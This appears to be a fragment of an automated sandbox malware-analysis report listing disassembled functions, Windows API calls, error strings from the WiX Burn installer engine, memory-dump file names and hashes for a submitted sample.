                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\dependency.cpp, xrefs: 00900CB0, 00900CF3
                                                                                                                                                                                                                                                                            • Failed to copy provider key for compatible entry., xrefs: 00900C9E
                                                                                                                                                                                                                                                                            • Failed to get provider information for compatible package: %ls, xrefs: 00900CE1
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Close
                                                                                                                                                                                                                                                                            • String ID: Failed to copy provider key for compatible entry.$Failed to get provider information for compatible package: %ls$d:\a\wix4\wix4\src\burn\engine\dependency.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3535843008-4100048506
                                                                                                                                                                                                                                                                            • Opcode ID: 72e3cadb63c4e0a3de1c34a25c3578350994d63f743209310da74e0804410500
                                                                                                                                                                                                                                                                            • Instruction ID: ecb9401c7b2a0cbcbb9d3611c5eb3d4665dee641a5f622d4c8852ff839484289
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 72e3cadb63c4e0a3de1c34a25c3578350994d63f743209310da74e0804410500
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C6413E71E40216BFDB14DFA8CC41FAEBBB4BB44710F104669E919E72C0E374A950DBA0
                                                                                                                                                                                                                                                                            Function 00947BD8 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 79timeCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00947E27: lstrlenW.KERNEL32(?), ref: 00947EF4
                                                                                                                                                                                                                                                                              • Part of subcall function 00947E27: lstrlenW.KERNEL32(00000000), ref: 00947F0A
                                                                                                                                                                                                                                                                            • GetSystemTimeAsFileTime.KERNEL32(00000000,?,00000000,?,00948702,?,00000000,HEAD,00000000,00000000,00948702,00000000,?,?,00000000,00000000), ref: 00947C79
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to connect to URL: %ls, xrefs: 00947C21
                                                                                                                                                                                                                                                                            • HEAD, xrefs: 00947C08
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\dlutil.cpp, xrefs: 00947C30
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Timelstrlen$FileSystem
                                                                                                                                                                                                                                                                            • String ID: Failed to connect to URL: %ls$HEAD$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\dlutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3954044709-1251758901
                                                                                                                                                                                                                                                                            • Opcode ID: f4daef343008cbef4c68ab6209d9d941ea5c7707fe115bd31fbc409bda0e7a64
                                                                                                                                                                                                                                                                            • Instruction ID: c1e3b071ab8970305de2366aa924800761e53a99fe8ff83e26efded064ad8872
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f4daef343008cbef4c68ab6209d9d941ea5c7707fe115bd31fbc409bda0e7a64
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0D217C7290421DAFDF159F94CD86DAFBBB9EF48701F118169F805A2350E7709E10AAA0
                                                                                                                                                                                                                                                                            Function 0094666D Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 77registryCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,?,?,?,00000000,00000000,00000000,00000000), ref: 00946717
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\polcutil.cpp, xrefs: 0094669E, 009466F8
                                                                                                                                                                                                                                                                            • Failed to open policy key: %ls, name: %ls, xrefs: 009466EC
                                                                                                                                                                                                                                                                            • Failed to open policy key: %ls, xrefs: 00946692
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Close
                                                                                                                                                                                                                                                                            • String ID: Failed to open policy key: %ls$Failed to open policy key: %ls, name: %ls$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\polcutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3535843008-3938230626
                                                                                                                                                                                                                                                                            • Opcode ID: 034a92ed62faa59923cb78e7366bb5eeb238da9f3ea42ad98b9690af90cf94f4
                                                                                                                                                                                                                                                                            • Instruction ID: a6ea990dcdc7584949847b618596a40efe2442d0d35943d74220aa51515ec4d2
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 034a92ed62faa59923cb78e7366bb5eeb238da9f3ea42ad98b9690af90cf94f4
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7821D5B2A40725BBDF215ED48C8AFDE7A68EB46B58F118021FA0566150D2B08D20D6E2
                                                                                                                                                                                                                                                                            Function 0093CCD3 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 77registryCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,?,008F828D,?,Resume,00000000,?,?,00000001,?,00000000,00000000,00000024), ref: 0093CD06
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: QueryValue
                                                                                                                                                                                                                                                                            • String ID: Error reading version registry value due to unexpected data type: %u$Failed to query registry key value.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\regutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3660427363-2246233778
                                                                                                                                                                                                                                                                            • Opcode ID: 8bd010c9d4db60018c74c74b79eda12be52ebbd6eb3c9c065a074ac55f171f8d
                                                                                                                                                                                                                                                                            • Instruction ID: 92a0e21c955a46b6a653b54a6b303cc7172d21b8127bfdbcbcfe87b48b9b1f8d
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8bd010c9d4db60018c74c74b79eda12be52ebbd6eb3c9c065a074ac55f171f8d
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7D1129F2900648B7EB209B168C49E9F7EADDBC5754F154039BA14B7281E5344E01DBB0
                                                                                                                                                                                                                                                                            Function 009440F8 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 76COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,?,00000000,000000FF,00000000,000000FF,00000000,?,00951D1C,00000000,00000000,00000000,00000000,00000000), ref: 0094418A
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to hash the string., xrefs: 0094414D
                                                                                                                                                                                                                                                                            • Invalid dictionary - bucket size index is out of range, xrefs: 0094410D
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\dictutil.cpp, xrefs: 00944121
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CompareString
                                                                                                                                                                                                                                                                            • String ID: Failed to hash the string.$Invalid dictionary - bucket size index is out of range$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\dictutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 1825529933-1798595610
                                                                                                                                                                                                                                                                            • Opcode ID: 42986c59dc2194732e744e34516130e8d4f8234a0a96114722f0d1ae554be518
                                                                                                                                                                                                                                                                            • Instruction ID: ebc7b4caa005d807ee54615c29874699a7849447cfab5ddc2df7c520bc1267f0
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 42986c59dc2194732e744e34516130e8d4f8234a0a96114722f0d1ae554be518
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C121F532658605FFDB10CF88DC85F5AB368FB2A724F104214F5149B290C7B5E990DBA0
                                                                                                                                                                                                                                                                            Function 00947545 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 68COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(008E6EDE,008E6DEA,008E6DA2,8351EC8B,5300FC65,F6B70F0B,008E6DEA,008E6D72,008E7172,008E6D72,008E6ECA,008E6EDE,008E7162,008E6DEA,008E6EDE,00000000), ref: 00947556
                                                                                                                                                                                                                                                                              • Part of subcall function 0093BFC9: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process2,008E6E9A,00000001,008E6DEA,?,?,?,00947562,00000000), ref: 0093BFE1
                                                                                                                                                                                                                                                                              • Part of subcall function 0093BFC9: GetProcAddress.KERNEL32(00000000), ref: 0093BFE8
                                                                                                                                                                                                                                                                              • Part of subcall function 0093BFC9: GetLastError.KERNEL32(?,?,?,00947562,00000000), ref: 0093C010
                                                                                                                                                                                                                                                                              • Part of subcall function 0094729B: RegCloseKey.ADVAPI32(00000000,00020019,?,?,008E6E9A,00000001,008E6DEA), ref: 00947376
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to query 64-bit related bundles., xrefs: 009475E3
                                                                                                                                                                                                                                                                            • Failed to query 32-bit related bundles., xrefs: 009475B6
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\butil.cpp, xrefs: 009475F2
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AddressCloseCurrentErrorHandleLastModuleProcProcess
                                                                                                                                                                                                                                                                            • String ID: Failed to query 32-bit related bundles.$Failed to query 64-bit related bundles.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\butil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3109562764-3570192855
                                                                                                                                                                                                                                                                            • Opcode ID: 912132d6247e439345b7b0fb1ba74b759258375efc0abd52b3b8021daae5f362
                                                                                                                                                                                                                                                                            • Instruction ID: c16cc4b3e35432b804b49a13fb18c5d0548a15c381cad16d0a89725f4ea2663a
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 912132d6247e439345b7b0fb1ba74b759258375efc0abd52b3b8021daae5f362
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9B21A0B5E41629AFCB51DFA8D985FCEBBF4AB08754F004516F919F7380E7749A008B90
                                                                                                                                                                                                                                                                            Function 0093D664 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 64registryCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 0093CBC2: RegOpenKeyExW.KERNELBASE(?,0093CBBE,00000000,00000000,00000003,00000000,?,?,00946603,80000002,00000000,00020019,00000000,00000000,SOFTWARE\Policies\,00000000), ref: 0093CBED
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,00000000,00020019,00000000,00000000,00000000,?,?,?,008F713E,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\RebootPending,00000000,00000000,80000002), ref: 0093D707
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to read value type: %ls/@%ls, xrefs: 0093D6E1
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\regutil.cpp, xrefs: 0093D6B3, 0093D6F0
                                                                                                                                                                                                                                                                            • Failed to open key: %ls, xrefs: 0093D6A4
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CloseOpen
                                                                                                                                                                                                                                                                            • String ID: Failed to open key: %ls$Failed to read value type: %ls/@%ls$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\regutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 47109696-3852982929
                                                                                                                                                                                                                                                                            • Opcode ID: 8e78f4f4ac451ab636ba80aa59a538ed4a4ad8e91528983acfaebe461afb25a6
                                                                                                                                                                                                                                                                            • Instruction ID: 2d9c543bea51e018ea5a72f368ef9a056380bceab0b09198c52664de818a6639
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8e78f4f4ac451ab636ba80aa59a538ed4a4ad8e91528983acfaebe461afb25a6
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4111EB77A41618BBDF219F84DC0BF9E7A6CEB09718F008150FA187A191D2B14E10EFD1
                                                                                                                                                                                                                                                                            Function 008F5CD4 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 64COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(00000000,00000000,00000000,000000FF,00000000,000000FF,IGNOREDEPENDENCIES,00000000,00000000,?,?,009003A0,00000000,IGNOREDEPENDENCIES,00000000,00000000), ref: 008F5D26
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to copy the property value., xrefs: 008F5D5A
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\package.cpp, xrefs: 008F5D6C
                                                                                                                                                                                                                                                                            • IGNOREDEPENDENCIES, xrefs: 008F5CDD
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CompareString
                                                                                                                                                                                                                                                                            • String ID: Failed to copy the property value.$IGNOREDEPENDENCIES$d:\a\wix4\wix4\src\burn\engine\package.cpp
                                                                                                                                                                                                                                                                            • API String ID: 1825529933-2032719239
                                                                                                                                                                                                                                                                            • Opcode ID: a2802aceb447dcc16d547f3ee9a3b62e607eac329cedc809150569fce9dc1283
                                                                                                                                                                                                                                                                            • Instruction ID: 6ffe1f0c30cebcc566ad872a53cb40fe1b10a4691cd99d06dd164eb8d0461aa5
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a2802aceb447dcc16d547f3ee9a3b62e607eac329cedc809150569fce9dc1283
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5E11083160161DBBDB10ABA89C8DFE973A4FF05B24F210375FB14EB1D1D27098108690
                                                                                                                                                                                                                                                                            Function 00926155 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 62synchronizationCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(0094E860,000000FF,00000000,00000002,?,?,009263B6,00000000,?,?,?), ref: 00926165
                                                                                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(0094E860,?,009263B6,00000000,?,?,?), ref: 009261FB
                                                                                                                                                                                                                                                                              • Part of subcall function 008E540B: GetProcessHeap.KERNEL32(?,00000000,?,008E5532,00000000,00000001,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 008E541C
                                                                                                                                                                                                                                                                              • Part of subcall function 008E540B: RtlAllocateHeap.NTDLL(00000000,?,008E5532,00000000,00000001,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 008E5423
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Heap$AllocateMutexObjectProcessReleaseSingleWait
                                                                                                                                                                                                                                                                            • String ID: Failed to allocate memory for message data$d:\a\wix4\wix4\src\burn\engine\netfxchainer.cpp
                                                                                                                                                                                                                                                                            • API String ID: 2993511968-954368992
                                                                                                                                                                                                                                                                            • Opcode ID: 78677577f60282a60d216de06c3f5011df3cc38fd984e663c41641d1bf0bfa3c
                                                                                                                                                                                                                                                                            • Instruction ID: 28f518a6ce204b8e8e8abf67cba79c02c53e4bba1f736f0cc98b3fd29cc72bf5
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 78677577f60282a60d216de06c3f5011df3cc38fd984e663c41641d1bf0bfa3c
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D61181B1300715AFCB14DF28DC85E5AB7A8FF0A724F104164FA149B392D771A860CBA5
                                                                                                                                                                                                                                                                            Function 008F90C9 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 60registryCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000,008E6DA2,00000002,00000001,00000000,00000000,?,?,?,?,?,?,00902F8D,008E6DA2,00000001,00000001), ref: 008F997D
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\registration.cpp, xrefs: 008F90F5, 008F9959
                                                                                                                                                                                                                                                                            • Failed to create registration key., xrefs: 008F912A
                                                                                                                                                                                                                                                                            • Failed to cache bundle from path: %ls, xrefs: 008F90E3
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Close
                                                                                                                                                                                                                                                                            • String ID: Failed to cache bundle from path: %ls$Failed to create registration key.$d:\a\wix4\wix4\src\burn\engine\registration.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3535843008-2361216137
                                                                                                                                                                                                                                                                            • Opcode ID: fd0871e8702d414812d9d0ea7279e6f65aeeb83cf4e367f86e6ba079f78e8578
                                                                                                                                                                                                                                                                            • Instruction ID: 33469b4763704211532504fec8d11c38e1df9213b33df794087c8d65198d172f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fd0871e8702d414812d9d0ea7279e6f65aeeb83cf4e367f86e6ba079f78e8578
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9311E331A44219BBDF129AA5EC4AFBE7E66EB44714F000151FB00F50A1D6A1C950DBA1
                                                                                                                                                                                                                                                                            Function 009403DA Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 59COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 009400B5: SysAllocString.OLEAUT32(00000000), ref: 009400C9
                                                                                                                                                                                                                                                                              • Part of subcall function 009400B5: VariantInit.OLEAUT32(?), ref: 009400D5
                                                                                                                                                                                                                                                                              • Part of subcall function 009400B5: VariantClear.OLEAUT32(?), ref: 009401C4
                                                                                                                                                                                                                                                                              • Part of subcall function 009400B5: SysFreeString.OLEAUT32(00000000), ref: 009401CF
                                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(00000001), ref: 00940466
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • failed XmlGetAttribute, xrefs: 009403FC
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp, xrefs: 0094040B
                                                                                                                                                                                                                                                                            • Failed to treat attribute value as UInt64., xrefs: 00940435
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
